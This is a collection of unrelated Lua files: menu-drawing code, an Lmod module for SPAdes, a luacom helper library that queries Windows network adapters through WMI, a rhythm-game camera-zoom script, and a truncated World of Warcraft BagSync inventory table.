self.Data.Index = 1000 - (1000 % #self.Data.Items)
self:UpdateSelection()
else
self.Data.Pagination.Max = self.Data.Pagination.Max + 1
self.Data.Pagination.Min = self.Data.Pagination.Max - (self.Data.Pagination.Total + 1)
self.Data.Index = self.Data.Index + 1
self:UpdateSelection()
end
else
self.Data.Index = self.Data.Index + 1
self:UpdateSelection()
end
else
self.Data.Index = self.Data.Index + 1
self:UpdateSelection()
end
end
---Draw
---@return nil
---@public
function UIMenuColourPanel:Draw()
if self.Data.Enabled then
self.Background:Size(431 + self.ParentItem:SetParentMenu().WidthOffset, 112)
self.Background:Draw()
if self.EnableArrow ~= false then
self.LeftArrow:Draw()
self.RightArrow:Draw()
end
self.Text:Draw()
self.SelectedRectangle:Draw()
for Index = 1, #self.Bar do
self.Bar[Index]:Draw()
end
self:Functions()
end
end
|
if z == nil and w == nil then
if x == y then
result = true
elseif x == z then
print(z)
if n then
print(n)
end
else
error()
end
else
error()
end
|
pushenv("CONDA_DEFAULT_ENV","spades-3.13.0-py36")
prepend_path{"PATH","/util/opt/anaconda/deployed-conda-envs/packages/spades/envs/spades-3.13.0-py36/bin",priority=100}
append_path("CONDA_ENVS_PATH", "/util/opt/anaconda/deployed-conda-envs/packages/spades/envs")
|
local bit32 = require "bit32"
local luacom = require "luacom"
local function split(str, sep, plain)
local b, res = 1, {}
while b <= #str do
local e, e2 = string.find(str, sep, b, plain)
if e then
res[#res + 1] = string.sub(str, b, e-1)
b = e2 + 1
else
res[#res + 1] = string.sub(str, b)
break
end
end
return res
end
local unpack = unpack or table.unpack
local function usplit(...) return unpack(split(...)) end
local function split_first(str, sep, plain)
local e, e2 = string.find(str, sep, nil, plain)
if e then
return string.sub(str, 1, e - 1), string.sub(str, e2 + 1)
end
return str
end
local function class(base)
local t = base and setmetatable({}, base) or {}
t.__index = t
t.__class = t
t.__base = base
function t.new(...)
local o = setmetatable({}, t)
if o.__init then
if t == ... then -- we call as Class:new()
return o:__init(select(2, ...))
else -- we call as Class.new()
return o:__init(...)
end
end
return o
end
return t
end
local function enum(o, f)
local e = luacom.GetEnumerator(o)
if f then
local function wrap(...)
if ... then return f(...) end
return ...
end
return function() return wrap(e:Next()) end
end
return function() return e:Next() end
end
local function luacom_build_error(ret)
local typ, info, msg = string.match(ret, 'COM (.-):(%b()):(.+)$')
if info then
local file, line = string.match(info, '^%((.-),(%d+)%)$')
if file then
return string.format("[LUACOM][%s][%s:%s] %s", typ, file, line, msg)
end
end
return ret
end
local function pcomcall(f, ...)
local ok, ret = pcall(f, ...)
if not ok then return nil, luacom_build_error(ret) end
return ret
end
local function pcomset(o, p, v)
local ok, ret = pcall(function() o[p] = v end)
if not ok then return nil, luacom_build_error(ret) end
return true
end
local function pcomget(o, p)
local ok, ret = pcall(function() return o[p] end)
if not ok then return nil, luacom_build_error(ret) end
return ret
end
local function pcommeth(o, p, ...)
local ok, ret = pcall(function() return o[p] end)
if not ok then return nil, luacom_build_error(ret) end
return pcomcall(ret, o, ...)
end
local function EachNetShare(cb)
local net = luacom.CreateObject('HNetCfg.HNetShare')
local connections = net:getEnumEveryConnection()
for item in enum(connections) do
local cnn = net:INetSharingConfigurationForINetConnection(item)
local props = net:NetConnectionProps(item)
local ok, ret = pcall(cb, cnn, props)
if (not ok) or ret then break end
end
connections, net = nil
collectgarbage'collect'
end
local function EachNetworkAdapter(cb)
local strComputer = "."
local objWMIService = luacom.GetObject("winmgmts:\\\\" .. strComputer .. "\\root\\CIMV2")
local colItems = objWMIService:ExecQuery("SELECT * FROM Win32_NetworkAdapter")
for objItem in enum(colItems) do
local ok, ret = pcall(cb, objItem)
if (not ok) or ret then break end
end
colItems, objWMIService = nil
collectgarbage'collect'
end
local function EachNetworkAdapterConfiguration(cb)
local strComputer = "."
local objWMIService = luacom.GetObject("winmgmts:\\\\" .. strComputer .. "\\root\\CIMV2")
local colItems = objWMIService:ExecQuery("SELECT * FROM Win32_NetworkAdapterConfiguration")
for objItem in enum(colItems) do
local ok, ret = pcall(cb, objItem)
if (not ok) or ret then break end
end
colItems, objWMIService = nil
collectgarbage'collect'
end
return {
bit32 = bit32;
class = class;
enum = enum;
pcomcall = pcomcall;
pcomset = pcomset;
pcomget = pcomget;
pcommeth = pcommeth;
split = split;
EachNetShare = EachNetShare;
EachNetworkAdapter = EachNetworkAdapter;
EachNetworkAdapterConfiguration = EachNetworkAdapterConfiguration;
}
|
require("settings")
require("keymappings")
|
function start (song)
setCamZoom(0.8)
setHudZoom(2)
showOnlyStrums = true
strumLine1Visible = false
strumLine2Visible = false
end
function update (elapsed)
if curStep >= 0 and curStep < 128 then
setCamZoom(0.8)
setHudZoom(1)
end
if curStep == 124 then
strumLine1Visible = true
end
if curStep == 128 then
strumLine1Visible = true
strumLine2Visible = true
showOnlyStrums = false
end
if curStep >= 418 and curStep < 420 then
setCamZoom(0.8)
end
if curStep == 420 then
setCamZoom(0.9)
end
if curStep >= 426 and curStep < 428 then
setCamZoom(0.8)
end
if curStep == 428 then
setCamZoom(0.9)
end
if curStep >= 498 and curStep < 500 then
setCamZoom(0.8)
end
if curStep == 500 then
setCamZoom(0.9)
end
if curStep >= 506 and curStep < 508 then
setCamZoom(0.8)
end
if curStep == 508 then
setCamZoom(0.9)
end
if curStep == 682 then
setCamZoom(0.9)
end
if curStep >= 700 and curStep < 701 then
setCamZoom(0.8)
end
if curStep >= 701 and curStep < 702 then
setCamZoom(0.9)
end
if curStep >= 702 and curStep < 703 then
setCamZoom(1)
end
if curStep == 703 then
setCamZoom(1.1)
end
if curStep >= 868 and curStep < 870 then
setCamZoom(0.8)
end
if curStep == 870 then
setCamZoom(0.9)
end
if curStep >= 876 and curStep < 878 then
setCamZoom(0.8)
end
if curStep == 878 then
setCamZoom(0.9)
end
if curStep >= 884 and curStep < 886 then
setCamZoom(0.8)
end
if curStep == 886 then
setCamZoom(0.9)
end
if curStep >= 912 and curStep < 928 then
setCamZoom(0.7)
end
if curStep >= 928 and curStep < 944 then
setCamZoom(0.75)
end
if curStep >= 944 and curStep < 960 then
setCamZoom(0.8)
end
if curStep >= 960 and curStep < 976 then
setCamZoom(0.85)
end
if curStep >= 976 and curStep < 992 then
setCamZoom(0.9)
end
if curStep >= 992 and curStep < 1008 then
setCamZoom(0.95)
end
if curStep >= 1008 and curStep < 1020 then
setCamZoom(1)
end
if curStep >= 1040 and curStep < 1056 then
setCamZoom(0.7)
end
if curStep >= 1056 and curStep < 1072 then
setCamZoom(0.75)
end
if curStep >= 1072 and curStep < 1088 then
setCamZoom(0.8)
end
if curStep >= 1088 and curStep < 1104 then
setCamZoom(0.85)
end
if curStep >= 1104 and curStep < 1120 then
setCamZoom(0.9)
end
if curStep >= 1120 and curStep < 1136 then
setCamZoom(0.95)
end
if curStep >= 1136 and curStep < 1148 then
setCamZoom(1)
end
end
function beatHit(beat) -- do nothing
end
function stepHit (step) -- do nothing
end
|
BagSyncDB = {
["Draenor"] = {
["Jyggen"] = {
["bag"] = {
{
"118332", -- [1]
"118331", -- [2]
"118099,16", -- [3]
"116020", -- [4]
"141195", -- [5]
[13] = "135558,3",
}, -- [1]
{
"127115,2", -- [1]
"113478,2", -- [2]
"113328,5", -- [3]
"113327,3", -- [4]
"71673", -- [5]
"71672", -- [6]
"71670", -- [7]
"71669", -- [8]
"141652", -- [9]
"141446,5", -- [10]
"138875,5", -- [11]
"119438", -- [12]
"116395", -- [13]
"140192", -- [14]
"113823", -- [15]
"113822", -- [16]
"113681,310", -- [17]
"128510", -- [18]
"118657", -- [19]
"141605", -- [20]
"128507", -- [21]
"86425", -- [22]
"138115", -- [23]
"26045,100", -- [24]
"26044,40", -- [25]
"138111", -- [26]
"124099,3", -- [27]
"118341", -- [28]
}, -- [2]
{
nil, -- [1]
nil, -- [2]
nil, -- [3]
nil, -- [4]
nil, -- [5]
"141257::::::::::::3:1824:1467:1675:::", -- [6]
"137375::::::::::::2:1826:1457:::", -- [7]
"133010::::::::::::2:768:1739:::", -- [8]
"133081::::::::::::1:767:::", -- [9]
"133030::::::::::::1:664:::", -- [10]
"137303::::::::::::1:1795:::", -- [11]
"141284::::::::::::1:1812:::", -- [12]
"137729", -- [13]
"128592", -- [14]
"128591", -- [15]
"128590", -- [16]
"128586", -- [17]
"128585", -- [18]
"128584", -- [19]
"128583", -- [20]
"137681", -- [21]
"130320", -- [22]
"97849,3", -- [23]
"71715", -- [24]
"71636", -- [25]
"141351", -- [26]
"133897", -- [27]
"71634", -- [28]
}, -- [3]
{
"6948", -- [1]
"110560", -- [2]
nil, -- [3]
"118632,20", -- [4]
"109076,5", -- [5]
"118054,10", -- [6]
"127880", -- [7]
nil, -- [8]
nil, -- [9]
"122457", -- [10]
nil, -- [11]
"86574", -- [12]
"118236,5", -- [13]
"115463", -- [14]
"71083,19", -- [15]
"138272", -- [16]
"34599,3", -- [17]
"133575,5", -- [18]
"109155,9", -- [19]
nil, -- [20]
"141007", -- [21]
"137304::::::::::::2:1826:1457:::", -- [22]
"129037::::::::::::1:1794:::", -- [23]
"141322", -- [24]
nil, -- [25]
nil, -- [26]
nil, -- [27]
"6218", -- [28]
}, -- [4]
[0] = {
"139086::::::::::::3:1726:1487:1675:::", -- [1]
"134405::::::::::::2:1826:1457:::", -- [2]
"137314::::::::::::3:1826:1808:1457:::", -- [3]
"129101::::::::::::1:1794:::", -- [4]
"129985", -- [5]
nil, -- [6]
"136412,3", -- [7]
nil, -- [8]
"133675,7", -- [9]
nil, -- [10]
"122388::::::::::::1:582:::", -- [11]
nil, -- [12]
"137207", -- [13]
nil, -- [14]
"121517::::::::::::1:1792:::", -- [15]
"141191", -- [16]
},
},
["guild"] = "Malaxnytt",
["realm"] = "Draenor",
["class"] = "MAGE",
["bank"] = {
[6] = {
"65906", -- [1]
"65905", -- [2]
"65904", -- [3]
"43157", -- [4]
"43156", -- [5]
"43155", -- [6]
"43154", -- [7]
"22999", -- [8]
"15199", -- [9]
"31804", -- [10]
"31781", -- [11]
"31778", -- [12]
"31773", -- [13]
"24004", -- [14]
"19031", -- [15]
"15197", -- [16]
"69210", -- [17]
"43348", -- [18]
"40643", -- [19]
"69209", -- [20]
"35279", -- [21]
"64884", -- [22]
},
[7] = {
"12185", -- [1]
"119293", -- [2]
"109585,3", -- [3]
"64396", -- [4]
"63128,4", -- [5]
"52843", -- [6]
"32620", -- [7]
"32446", -- [8]
"32388,8", -- [9]
"86547,2", -- [10]
"94221,2", -- [11]
"95568", -- [12]
"95491,83", -- [13]
"113681,1000", -- [14]
"118656", -- [15]
"118655", -- [16]
"118654", -- [17]
"118100,2", -- [18]
"79265", -- [19]
"118379", -- [20]
"118378", -- [21]
"118376", -- [22]
},
[8] = {
"26045,100", -- [1]
"26044,40", -- [2]
"118346", -- [3]
"118345", -- [4]
"118344", -- [5]
"94288,81", -- [6]
"89815", -- [7]
"94222", -- [8]
"19022", -- [9]
"84661", -- [10]
"107950", -- [11]
},
[10] = {
},
[-1] = {
"92968", -- [1]
"22743", -- [2]
"95487,10", -- [3]
"94226,2", -- [4]
"94223", -- [5]
"92676", -- [6]
"37863", -- [7]
"71083,41", -- [8]
"118007,5", -- [9]
"141002", -- [10]
"141001", -- [11]
"45073", -- [12]
"64644", -- [13]
"33292", -- [14]
"46723", -- [15]
"33864", -- [16]
"23324", -- [17]
"44800", -- [18]
"44785", -- [19]
"34685", -- [20]
"34087", -- [21]
"33863", -- [22]
"22742", -- [23]
"19028", -- [24]
"6835", -- [25]
"22745", -- [26]
"34683", -- [27]
"34086", -- [28]
},
[5] = {
"33868", -- [1]
"22744", -- [2]
"102246", -- [3]
"27944", -- [4]
"118306", -- [5]
"34826", -- [6]
"112320::::::::::::2:525:529:::", -- [7]
"128318", -- [8]
"89195", -- [9]
"89193", -- [10]
"89191", -- [11]
"98091", -- [12]
"98085", -- [13]
"98080", -- [14]
"98079", -- [15]
"6833", -- [16]
"118372", -- [17]
"89799", -- [18]
"65909", -- [19]
"65907", -- [20]
},
[9] = {
},
[11] = {
},
},
["faction"] = "Horde",
["AH_LastScan"] = 1491923385,
["auction"] = {
[0] = {
},
},
["void"] = {
[0] = {
"16795", -- [1]
"16801", -- [2]
"32273", -- [3]
"16797", -- [4]
"16798", -- [5]
"32344", -- [6]
"31038", -- [7]
"12609", -- [8]
"99658", -- [9]
"16913", -- [10]
"99576", -- [11]
"16918", -- [12]
"28317", -- [13]
"30763", -- [14]
"29076", -- [15]
"29080", -- [16]
"29078", -- [17]
"29079", -- [18]
"29077", -- [19]
"28374", -- [20]
"34190", -- [21]
"30206", -- [22]
"30205", -- [23]
"30207", -- [24]
"30210", -- [25]
"30196", -- [26]
"27824", -- [27]
"34198", -- [28]
"31056", -- [29]
"31055", -- [30]
"31058", -- [31]
"31059", -- [32]
"31057", -- [33]
"34574", -- [34]
"27768", -- [35]
"70362", -- [36]
"40415", -- [37]
"40417", -- [38]
"60246", -- [39]
"40418", -- [40]
"86715", -- [41]
"9999", -- [42]
"46131", -- [43]
"45367", -- [44]
"45369", -- [45]
"86716", -- [46]
"86718", -- [47]
"85374", -- [48]
"46129", -- [49]
"46132", -- [50]
"46133", -- [51]
"46130", -- [52]
"85376", -- [53]
"85378", -- [54]
"85375", -- [55]
"76213", -- [56]
"71286", -- [57]
"76214", -- [58]
"76215", -- [59]
"32340", -- [60]
"32353", -- [61]
"33333", -- [62]
"78671", -- [63]
"78720", -- [64]
"78748", -- [65]
"78729", -- [66]
"28565", -- [67]
"32329", -- [68]
"34926", -- [69]
"113803", -- [70]
"113798", -- [71]
"113801", -- [72]
"113799", -- [73]
"113797", -- [74]
"113800", -- [75]
"113802", -- [76]
"116470", -- [77]
},
},
["gold"] = 909134727,
["equip"] = {
[0] = {
"139749::::::::::::2:3385:3383:::", -- [1]
"130233::::::::::::4:3406:596:601:689:::", -- [2]
"121754", -- [3]
nil, -- [4]
"134307::::::::::::3:1824:1467:1675:::", -- [5]
"140625", -- [6]
"121326::::::::::::3:1825:1477:3339:::", -- [7]
"121499::::::::::::2:767:1734:::", -- [8]
"139754::::::::::::2:3385:3383:::", -- [9]
"139125::::::::::::4:1824:41:1467:1675:::", -- [10]
"134191::::::::::::3:1825:1477:3339:::", -- [11]
"134528::::::::::::4:1826:1808:1467:3339:::", -- [12]
"139114::::::::::::4:1824:604:1467:1675:::", -- [13]
"134204::::::::::::4:1824:604:1472:3339:::", -- [14]
"134202::::::::::::4:1825:1808:1472:1675:::", -- [15]
"128820", -- [16]
"133959", -- [17]
},
},
["reagentbank"] = {
[-3] = {
"124441,14", -- [1]
"124440,113", -- [2]
"124442", -- [3]
"109693,61", -- [4]
"113588,15", -- [5]
"10978", -- [6]
"124439,19", -- [7]
"124438,21", -- [8]
"124124,17", -- [9]
"120945,442", -- [10]
"116053", -- [11]
"124121,4", -- [12]
"124120", -- [13]
"124119,4", -- [14]
"124118", -- [15]
"124117", -- [16]
"74854,5", -- [17]
"115508", -- [18]
"111556,107", -- [19]
"127037,22", -- [20]
"124437,200", -- [21]
"124437,76", -- [22]
"98619,18", -- [23]
"54440,4", -- [24]
},
},
["AH_Count"] = 0,
["mailbox"] = {
[0] = {
},
},
},
},
["Stormscale"] = {
["Jyggen"] = {
["bag"] = {
{
}, -- [1]
{
[3] = "8544,2",
}, -- [2]
{
[3] = "3356,15",
[4] = "3357,15",
}, -- [3]
{
}, -- [4]
[0] = {
"6948", -- [1]
"17031", -- [2]
"6365", -- [3]
"8523", -- [4]
"7514", -- [5]
"17032,5", -- [6]
"3928,2", -- [7]
"1710,5", -- [8]
nil, -- [9]
"4306,13", -- [10]
"6451", -- [11]
"4093", -- [12]
"8545", -- [13]
"29222", -- [14]
},
},
["realm"] = "Stormscale",
["gold"] = 242244,
["equip"] = {
[0] = {
"14178", -- [1]
"10711", -- [2]
"4197", -- [3]
"6096", -- [4]
"6324", -- [5]
"4720", -- [6]
"14193", -- [7]
"15697", -- [8]
"4545", -- [9]
"7471", -- [10]
"6414", -- [11]
"3739", -- [12]
nil, -- [13]
nil, -- [14]
"9822", -- [15]
"9517", -- [16]
[19] = "5976",
},
},
["class"] = "MAGE",
["faction"] = "Horde",
["bank"] = {
[-1] = {
"6359", -- [1]
"6370", -- [2]
"6358,2", -- [3]
"8831,7", -- [4]
"4625,7", -- [5]
"8153,3", -- [6]
"3819,2", -- [7]
"3821,9", -- [8]
"3818,16", -- [9]
"3357,7", -- [10]
"3356,18", -- [11]
"3369,2", -- [12]
"3355,5", -- [13]
"3820,4", -- [14]
"2453,8", -- [15]
"2452,11", -- [16]
"2450,2", -- [17]
"2447,8", -- [18]
"765,6", -- [19]
"2772,2", -- [20]
"2771,3", -- [21]
"4306,11", -- [22]
},
},
},
},
["ArgentDawn"] = {
["Isabèllá"] = {
["realm"] = "ArgentDawn",
["bag"] = {
{
"5976", -- [1]
"2770,20", -- [2]
"32446", -- [3]
"31310", -- [4]
"31251", -- [5]
"128425", -- [6]
"128510", -- [7]
"128507", -- [8]
"128427", -- [9]
"128426", -- [10]
"115301", -- [11]
"32427", -- [12]
"30259", -- [13]
"3427", -- [14]
"4309", -- [15]
}, -- [1]
{
"24688", -- [1]
"35345", -- [2]
[11] = "28570",
[13] = "6796",
[15] = "3428",
[9] = "24686",
[16] = "35221",
}, -- [2]
{
nil, -- [1]
"30721", -- [2]
"10008", -- [3]
"33047", -- [4]
"28726", -- [5]
"24675", -- [6]
"29780", -- [7]
"6242", -- [8]
nil, -- [9]
"14297", -- [10]
nil, -- [11]
nil, -- [12]
"24647", -- [13]
"13858", -- [14]
nil, -- [15]
"30520", -- [16]
}, -- [3]
{
"6948", -- [1]
"118236", -- [2]
"128506", -- [3]
"128505", -- [4]
"29796", -- [5]
"24421,13", -- [6]
"25308", -- [7]
[11] = "140999",
[13] = "29269",
[15] = "141000",
[10] = "7005",
[12] = "5956",
[14] = "3419",
[9] = "25806",
}, -- [4]
[0] = {
"134021", -- [1]
"6381", -- [2]
"34667", -- [3]
"35347", -- [4]
"24679", -- [5]
"28278", -- [6]
"25637", -- [7]
"6539", -- [8]
"35965", -- [9]
"10045", -- [10]
"6241", -- [11]
"2572", -- [12]
"14337", -- [13]
"24641", -- [14]
"9822", -- [15]
"17723", -- [16]
},
},
["guild"] = "Blinkspeed Couriers",
["gold"] = 661251,
["equip"] = {
[0] = {
[11] = "30366",
[2] = "34678",
[8] = "28517",
[12] = "29285",
[14] = "38290",
[5] = "21861",
[13] = "18859",
},
},
["class"] = "MAGE",
["faction"] = "Alliance",
["mailbox"] = {
[0] = {
},
},
},
["Flöyd"] = {
["bag"] = {
{
"122251::::::::::::1:582:::", -- [1]
"122381::::::::::::1:582:::", -- [2]
"6585", -- [3]
"58906", -- [4]
"6323", -- [5]
"3191", -- [6]
"1361", -- [7]
"1794", -- [8]
"4606", -- [9]
"57389", -- [10]
"81055,9", -- [11]
"1787", -- [12]
"1182", -- [13]
"5976", -- [14]
"57399", -- [15]
"57401", -- [16]
}, -- [1]
{
"6460", -- [1]
"1770", -- [2]
"122260::::::::::::1:582:::", -- [3]
"65984", -- [4]
"51994", -- [5]
"122245::::::::::::1:582:::", -- [6]
"122355::::::::::::1:582:::", -- [7]
"122389", -- [8]
"122391::::::::::::1:582:::", -- [9]
"58923", -- [10]
"2965", -- [11]
"58917", -- [12]
}, -- [2]
{
[6] = "58911",
}, -- [3]
{
}, -- [4]
[0] = {
"6948", -- [1]
"2806", -- [2]
"57255", -- [3]
"58914", -- [4]
"2589,4", -- [5]
"57388", -- [6]
"2966", -- [7]
"2592,10", -- [8]
"4566", -- [9]
"1205,3", -- [10]
"58926", -- [11]
"57397", -- [12]
"58905", -- [13]
"57402", -- [14]
"58918", -- [15]
"57258", -- [16]
},
},
["guild"] = "Blinkspeed Couriers",
["gold"] = 1358099,
["equip"] = {
[0] = {
nil, -- [1]
"122667::::::::::::1:582:::", -- [2]
nil, -- [3]
"45", -- [4]
nil, -- [5]
"4693", -- [6]
"2986", -- [7]
"57527", -- [8]
[13] = "122530::::::::::::1:582:::",
[14] = "122361::::::::::::1:582:::",
},
},
["class"] = "PALADIN",
["faction"] = "Alliance",
["realm"] = "ArgentDawn",
},
["Isabèllé"] = {
["bag"] = {
{
"112433", -- [1]
"117246", -- [2]
"2980", -- [3]
"2592,8", -- [4]
"11175", -- [5]
"4570", -- [6]
"2978", -- [7]
"118771", -- [8]
"112666", -- [9]
"77589,4", -- [10]
"94050", -- [11]
"6537", -- [12]
"2979", -- [13]
"4701", -- [14]
"60700", -- [15]
"117251", -- [16]
"33292", -- [17]
"24793", -- [18]
"4344", -- [19]
"21524", -- [20]
"112449,6", -- [21]
"24800", -- [22]
}, -- [1]
{
"120304", -- [1]
"117247", -- [2]
"117250", -- [3]
"117252", -- [4]
"112441", -- [5]
"24714", -- [6]
"4695", -- [7]
"110560", -- [8]
"112668", -- [9]
"117254", -- [10]
"117249", -- [11]
"117256", -- [12]
"2429", -- [13]
"3428", -- [14]
"24795", -- [15]
"44803", -- [16]
"13858", -- [17]
[19] = "117253",
}, -- [2]
{
}, -- [3]
{
}, -- [4]
[0] = {
"6948", -- [1]
"108920,14", -- [2]
"9809", -- [3]
"5976", -- [4]
"115301", -- [5]
"33154", -- [6]
"117244", -- [7]
"117242", -- [8]
"33470,11", -- [9]
"117248", -- [10]
"117241", -- [11]
"2589,60", -- [12]
"858,2", -- [13]
"6537", -- [14]
"2287,4", -- [15]
"6537", -- [16]
},
},
["guild"] = "Blinkspeed Couriers",
["class"] = "ROGUE",
["AH_LastScan"] = 1491088410,
["auction"] = {
[0] = {
},
},
["realm"] = "ArgentDawn",
["faction"] = "Alliance",
["equip"] = {
[0] = {
nil, -- [1]
"118766", -- [2]
nil, -- [3]
"4336", -- [4]
nil, -- [5]
"6539", -- [6]
"9851", -- [7]
"24686", -- [8]
[11] = "118761",
[13] = "117243",
[12] = "117245",
[14] = "118776",
},
},
["gold"] = 10680,
["AH_Count"] = 0,
["mailbox"] = {
[0] = {
},
},
},
["Keestra"] = {
["bag"] = {
[0] = {
"6948", -- [1]
[3] = "5976",
[9] = "114015,2",
},
},
["gold"] = 5858,
["equip"] = {
[0] = {
[8] = "24146",
},
},
["class"] = "PALADIN",
["faction"] = "Horde",
["realm"] = "ArgentDawn",
},
["Picaboo"] = {
["bag"] = {
{
"58994", -- [1]
"2983", -- [2]
"10008", -- [3]
"52027", -- [4]
"76061,2", -- [5]
"89112", -- [6]
"72238", -- [7]
"97623,8", -- [8]
"97620,3", -- [9]
"97619,4", -- [10]
"72234", -- [11]
"108339,4", -- [12]
"108331,9", -- [13]
"2450,3", -- [14]
"4600,9", -- [15]
"5976", -- [16]
"29767", -- [17]
"24602", -- [18]
"24688", -- [19]
"4330", -- [20]
"34856", -- [21]
"34853", -- [22]
}, -- [1]
{
"9851", -- [1]
"85182", -- [2]
"57560", -- [3]
"24687", -- [4]
"84037", -- [5]
"24692", -- [6]
"9795", -- [7]
"24685", -- [8]
"52583", -- [9]
"83689", -- [10]
"25309", -- [11]
"138295", -- [12]
"57571", -- [13]
"80926", -- [14]
"24690", -- [15]
"25110", -- [16]
"24678", -- [17]
"85192", -- [18]
}, -- [2]
{
"87652", -- [1]
"36694", -- [2]
"112392", -- [3]
[13] = "34085",
[7] = "6418",
[14] = "18486",
[15] = "98873",
[17] = "36042",
[5] = "3421",
[10] = "83176",
[6] = "36065",
[12] = "23322",
[18] = "29926",
}, -- [3]
{
"6948", -- [1]
"109599,2", -- [2]
"118236", -- [3]
"128506", -- [4]
"128505", -- [5]
"81400", -- [6]
"78859", -- [7]
"78856", -- [8]
nil, -- [9]
"112449", -- [10]
"76097,2", -- [11]
"36694", -- [12]
"100973", -- [13]
"31289", -- [14]
}, -- [4]
[0] = {
"17307", -- [1]
"22644", -- [2]
"72988,13", -- [3]
"81356", -- [4]
"30249", -- [5]
"26043,46", -- [6]
"128510", -- [7]
"128507", -- [8]
"115301", -- [9]
"33154", -- [10]
"21524", -- [11]
"36429", -- [12]
"80920", -- [13]
"85194", -- [14]
"5976", -- [15]
"87345", -- [16]
},
},
["guild"] = "Blinkspeed Couriers",
["class"] = "PRIEST",
["AH_LastScan"] = 1491405720,
["auction"] = {
[0] = {
},
},
["realm"] = "ArgentDawn",
["faction"] = "Alliance",
["equip"] = {
[0] = {
nil, -- [1]
"85191", -- [2]
nil, -- [3]
nil, -- [4]
"9791", -- [5]
"9799", -- [6]
"9797", -- [7]
"4321", -- [8]
[11] = "83235",
[13] = "88583",
[12] = "83235",
[14] = "83245",
},
},
["gold"] = 23852706,
["mailbox"] = {
[0] = {
},
},
["AH_Count"] = 0,
},
["Thure"] = {
["bag"] = {
[0] = {
"6948", -- [1]
"62328,5", -- [2]
"3300", -- [3]
"77509", -- [4]
"57387", -- [5]
[11] = "77278",
[12] = "77279",
[7] = "72019",
[9] = "72020",
},
},
["guild"] = "The Dainty Damsel",
["gold"] = 124,
["equip"] = {
[0] = {
"122248", -- [1]
nil, -- [2]
"122376", -- [3]
nil, -- [4]
"122383", -- [5]
"118532", -- [6]
"122254", -- [7]
nil, -- [8]
"77526", -- [9]
nil, -- [10]
nil, -- [11]
nil, -- [12]
"122530::::::::::::1:582:::", -- [13]
"122361::::::::::::1:582:::", -- [14]
"122261::::::::::::1:582:::", -- [15]
"122385::::::::::::1:582:::", -- [16]
"122385::::::::::::1:582:::", -- [17]
},
},
["class"] = "MONK",
["faction"] = "Alliance",
["realm"] = "ArgentDawn",
},
["Saelbes"] = {
["bag"] = {
{
"55268", -- [1]
"2303", -- [2]
"25541", -- [3]
"15163", -- [4]
"122382::::::::::::1:582:::", -- [5]
"113768::::::::::::1:124:::", -- [6]
"6263", -- [7]
"55437", -- [8]
"122353::::::::::::1:582:::", -- [9]
"6238", -- [10]
}, -- [1]
{
"38219", -- [1]
"1716", -- [2]
"65931", -- [3]
"2981", -- [4]
"122262::::::::::::1:582:::", -- [5]
"113705::::::::::::1:111:::", -- [6]
}, -- [2]
{
"66899", -- [1]
"38613", -- [2]
"6527", -- [3]
"55859", -- [4]
"55862", -- [5]
"66886", -- [6]
"66910", -- [7]
"66907", -- [8]
}, -- [3]
{
"112365::::::::::::1:37:::", -- [1]
"122378::::::::::::1:582:::", -- [2]
"51960", -- [3]
"113722::::::::::::1:124:::", -- [4]
"113705::::::::::::1:46:::", -- [5]
"122384::::::::::::1:582:::", -- [6]
"20407", -- [7]
"9748", -- [8]
}, -- [4]
[0] = {
"6948", -- [1]
"113768::::::::::::1:126:::", -- [2]
"31297", -- [3]
"21696", -- [4]
"55668", -- [5]
"14100", -- [6]
"122256::::::::::::1:582:::", -- [7]
"122250::::::::::::1:582:::", -- [8]
"10102", -- [9]
"35631", -- [10]
"113687::::::::::::1:26:::", -- [11]
"44370", -- [12]
"55688", -- [13]
"24679", -- [14]
"35673", -- [15]
"3055", -- [16]
},
},
["guild"] = "Blinkspeed Couriers",
["gold"] = 3686189,
["equip"] = {
[0] = {
[11] = "66893",
[2] = "66902",
[8] = "25717",
[12] = "66890",
[14] = "55819",
[5] = "2585",
[13] = "55810",
},
},
["class"] = "DRUID",
["faction"] = "Alliance",
["realm"] = "ArgentDawn",
},
["Velouría"] = {
["bag"] = {
{
"24671", -- [1]
"24756", -- [2]
"35962", -- [3]
"6256", -- [4]
"14199", -- [5]
"2853", -- [6]
nil, -- [7]
"22829", -- [8]
nil, -- [9]
nil, -- [10]
"2582", -- [11]
"6603", -- [12]
"14172", -- [13]
"24800", -- [14]
"38277", -- [15]
[17] = "36191",
[18] = "112361::::::::::::1:39:::",
[19] = "38",
[20] = "41252",
[22] = "122251::::::::::::1:582:::",
[23] = "21861",
[24] = "35663",
[25] = "6567",
[27] = "24664",
[28] = "113685::::::::::::1:30:::",
[29] = "122355::::::::::::1:582:::",
[30] = "33444,4",
}, -- [1]
{
"36431", -- [1]
"41255", -- [2]
nil, -- [3]
"36502", -- [4]
nil, -- [5]
"11840", -- [6]
nil, -- [7]
"5976", -- [8]
nil, -- [9]
nil, -- [10]
"21945", -- [11]
"142337", -- [12]
"36210", -- [13]
"33454,3", -- [14]
nil, -- [15]
"33452,3", -- [16]
[27] = "2315",
[24] = "122391::::::::::::1:582:::",
[21] = "43465",
[18] = "35607",
[29] = "38221",
[23] = "122389",
[30] = "35599",
}, -- [2]
{
"122381::::::::::::1:582:::", -- [1]
"2568", -- [2]
"2575", -- [3]
"6266", -- [4]
nil, -- [5]
"49514", -- [6]
nil, -- [7]
"44800", -- [8]
"39680", -- [9]
"35641", -- [10]
"24877", -- [11]
"24716", -- [12]
"51989", -- [13]
"12425", -- [14]
"36340", -- [15]
"24656", -- [16]
"44362", -- [17]
"4312", -- [18]
"24091", -- [19]
"9922", -- [20]
"4242", -- [21]
"57", -- [22]
"10035", -- [23]
"21852", -- [24]
"14168", -- [25]
"122260::::::::::::1:582:::", -- [26]
"6836", -- [27]
"44361", -- [28]
"28176", -- [29]
"122349::::::::::::1:582:::", -- [30]
}, -- [3]
{
"6948", -- [1]
"124640,2", -- [2]
"44817", -- [3]
"35634", -- [4]
"25161", -- [5]
"122349::::::::::::1:582:::", -- [6]
nil, -- [7]
"25299", -- [8]
nil, -- [9]
nil, -- [10]
"69209", -- [11]
"1937", -- [12]
nil, -- [13]
nil, -- [14]
"3419", -- [15]
"74283", -- [16]
[24] = "25701",
[22] = "3288",
[26] = "7051",
[27] = "5108",
}, -- [4]
[0] = {
"837", -- [1]
"2614", -- [2]
"35660", -- [3]
"4306,4", -- [4]
"143931", -- [5]
"24897", -- [6]
"9446", -- [7]
"42768", -- [8]
"22832", -- [9]
"51987", -- [10]
"15359", -- [11]
"122245::::::::::::1:582:::", -- [12]
"36193", -- [13]
"9748", -- [14]
"6795", -- [15]
"15164", -- [16]
},
},
